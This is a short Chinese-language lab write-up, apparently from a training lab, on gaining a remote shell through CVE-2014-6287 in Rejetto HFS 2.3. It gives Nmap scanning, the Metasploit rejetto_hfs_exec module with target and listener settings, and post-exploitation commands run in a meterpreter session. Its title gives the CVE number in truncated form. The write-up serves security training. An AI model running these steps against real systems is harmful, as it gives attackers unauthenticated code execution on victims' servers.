在 HFS 2.3 上使用 Metasploit 进行 RCE - CVE-2014-62
🔖 项目标题
> 通过 HTTP 文件服务器(HFS 2.3)进行远程代码执行
⚙ 使用的工具 • Kali Linux • Nmap • Metasploit • 目标:Windows 7 上的 HFS 2.3
🔐 漏洞详情 • 名称:CVE-2014-6287 • 类型:远程代码执行 • 原因:HFS 脚本中未经验证的输入 • 影响:无需认证即可获得 shell 访问权限
🔍 方法论(分步操作)
🔹 步骤 1:信息收集(Nmap)
• nmap -sV demo.ine.local (目标 IP)
• 发现开放端口:80
• 服务:rejetto HTTP 文件服务器 2.3

🔹 步骤 2:漏洞利用(Metasploit)
• Msfconsole
• 搜索 HFS 或 rejetto
• use exploit/windows/http/rejetto_hfs_exec
• set RHOST 192.168.1.100
• set RPORT 80
• set LHOST 192.168.1.101
• run
漏洞利用
🔹 步骤 3:后渗透
运行后你将获得 meterpreter 会话 使用命令:shell
• whoami • ipconfig • dir

